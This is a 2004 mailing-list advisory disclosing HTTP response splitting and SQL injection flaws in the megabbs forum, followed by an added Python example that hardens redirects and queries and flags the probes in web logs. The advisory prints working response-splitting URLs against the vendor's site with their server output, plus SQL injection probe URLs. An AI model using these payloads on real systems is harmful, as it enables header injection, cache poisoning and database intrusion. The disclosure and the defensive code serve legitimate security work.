Message-ID: <S695131AbUIZR44/20040926175656Z+226533@mail.yandex.ru>
Date: Sun, 26 Sep 2004 21:56:44 +0400
From: "pigrelax" <pigrelax@...dex.ru>
To: <full-disclosure@...ts.netsys.com>
Cc: <bugtraq@...urityfocus.com>, <info@...soft.com>
Subject: HTTP Response Splitting and SQL injection in megabbs forum


URL: http://www.pd9soft.com 
Tested megabbs 2.1 

1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Result:

<...>
HTTP/1.1 302 Object moved 
Connection: close 
Date: Sun, 26 Sep 2004 14:14:02 GMT 
Server: Microsoft-IIS/6.0 
Location: /megabbs/forums/forum-view.asp?fid= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 33 

<html>Scanned by Maxpatrol</html> 

Content-Length: 290 
Content-Type: text/html 
Expires: Sun, 26 Sep 2004 14:13:02 GMT 
Set-Cookie: guestID=309; path=/ 
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/ 
Cache-contro
<...>


2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&action=writenew&displaytype=flat

Result:
<...>
HTTP/1.1 302 Object moved 
Connection: close 
Date: Sun, 26 Sep 2004 14:34:05 GMT 
Server: Microsoft-IIS/6.0 
Location: /megabbs/forums/forum-view.asp?fid= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 33 

<html>Scanned by Maxpatrol</html> 

Content-Length: 290 
Content-Type: text/html 
Expires: Sun, 26 Sep 2004 14:33:05 GMT 
Set-Cookie: guestID=421; path=/ 
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/ 
Cache-contro
<...>

3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1' 
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'


MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
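The advisory above shows two defects in the same script family: the `fid` parameter is copied verbatim into a `Location` header (so an encoded CR/LF ends the redirect and starts a second, attacker-written response), and several id-style parameters are concatenated into SQL. The following is an added defensive example, not code from megabbs or from the advisory's author. It shows the two fixes a maintainer would apply (allow-listing the redirect id, binding the query parameter and allow-listing the ORDER BY inputs that cannot be bound) and a small detector that flags both probe patterns in web-server log lines. Paths and parameter names are the ones quoted in the advisory; the `ladder_log` table schema, the `SORT_COLUMNS` set and the simplified W3C-style log layout are assumptions, and the log lines are constructed.

```python
"""Added defensive example for the megabbs advisory: redirect and query
hardening plus log detection. Not code from megabbs or the advisory author."""
import re
import sqlite3
from urllib.parse import parse_qs

# ---- 1. Response-splitting fix: never let CR/LF/NUL reach a header value ----
_HEADER_BREAK = re.compile(r"[\r\n\x00]")

def build_forum_redirect(fid: str) -> str:
    """Location value for the 302 shown in the advisory. The vulnerable page
    copies fid verbatim; here fid must be a decimal id, which excludes CR/LF."""
    if not re.fullmatch(r"[0-9]{1,9}", fid):
        raise ValueError("invalid forum id")
    return f"/megabbs/forums/forum-view.asp?fid={fid}"

def safe_header_value(value: str) -> str:
    """Fallback for free-form header values: reject anything that ends a header line."""
    if _HEADER_BREAK.search(value):
        raise ValueError("CR/LF or NUL in header value")
    return value

# ---- 2. SQL-injection fix for ladder-log.asp-style parameters ----
SORT_COLUMNS = {"completeddate", "id"}      # assumed columns; identifiers cannot be bound
SORT_DIRS = {"0": "ASC", "1": "DESC"}

def fetch_ladder_log(conn, categoryid: str, sortby: str, sortdir: str):
    """categoryid is bound as a parameter; sortby/sortdir are SQL identifiers,
    so they are allow-listed rather than concatenated. int() rejects probes like 1'."""
    if sortby not in SORT_COLUMNS or sortdir not in SORT_DIRS:
        raise ValueError("invalid sort parameter")
    sql = (f"SELECT id, completeddate FROM ladder_log WHERE categoryid = ? "
           f"ORDER BY {sortby} {SORT_DIRS[sortdir]}")
    return conn.execute(sql, (int(categoryid),)).fetchall()

def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the forum's ladder log (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ladder_log (id INTEGER, categoryid INTEGER, completeddate TEXT)")
    conn.executemany("INSERT INTO ladder_log VALUES (?, ?, ?)",
                     [(1, 1, "2004-09-01"), (2, 1, "2004-09-20"), (3, 2, "2004-09-10")])
    return conn

def rejects(fn, *args) -> bool:
    """True if fn(*args) raises ValueError; used to exercise the input checks."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False

# ---- 3. Detection over log lines ----
_NUM_THEN_QUOTE = re.compile(r"[0-9]+'")    # the id' probe pattern used in the advisory

def classify_query(query: str) -> set:
    """Tags for one query string: response-splitting if a value holds a raw CR/LF
    after URL-decoding, sqli-probe if a numeric value is immediately followed by '."""
    tags = set()
    for values in parse_qs(query, keep_blank_values=True).values():
        for v in values:
            if "\r" in v or "\n" in v:
                tags.add("response-splitting")
            if _NUM_THEN_QUOTE.match(v):
                tags.add("sqli-probe")
    return tags

# Constructed, simplified W3C-style lines: date time method uri-stem uri-query status.
SAMPLE_LOG = """\
2004-09-26 14:14:02 GET /megabbs/forums/thread-post.asp action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK 302
2004-09-26 14:15:10 GET /megabbs/forums/forum-view.asp fid=12 200
2004-09-26 14:16:33 GET /megabbs/ladder-log.asp categoryid=1&sortby=completeddate&sortdir=1' 500
2004-09-26 14:17:01 GET /megabbs/view-profile.asp type=single&memberid=42 200
"""

def scan_log(text: str) -> list:
    """(line number, uri-stem, tags) for every line that trips a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 6:
            continue
        tags = classify_query(fields[4])
        if tags:
            hits.append((n, fields[3], tags))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The detector decodes the query before looking for CR/LF, so it catches the `%0d%0a` form in the advisory as well as upper-case or raw variants; it does not attempt double-decoding, which a real deployment behind a decoding proxy would need to add. The redirect fix deliberately allow-lists rather than strips: a stripped value would still produce a redirect to an unintended forum, whereas rejecting it surfaces the bad request.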

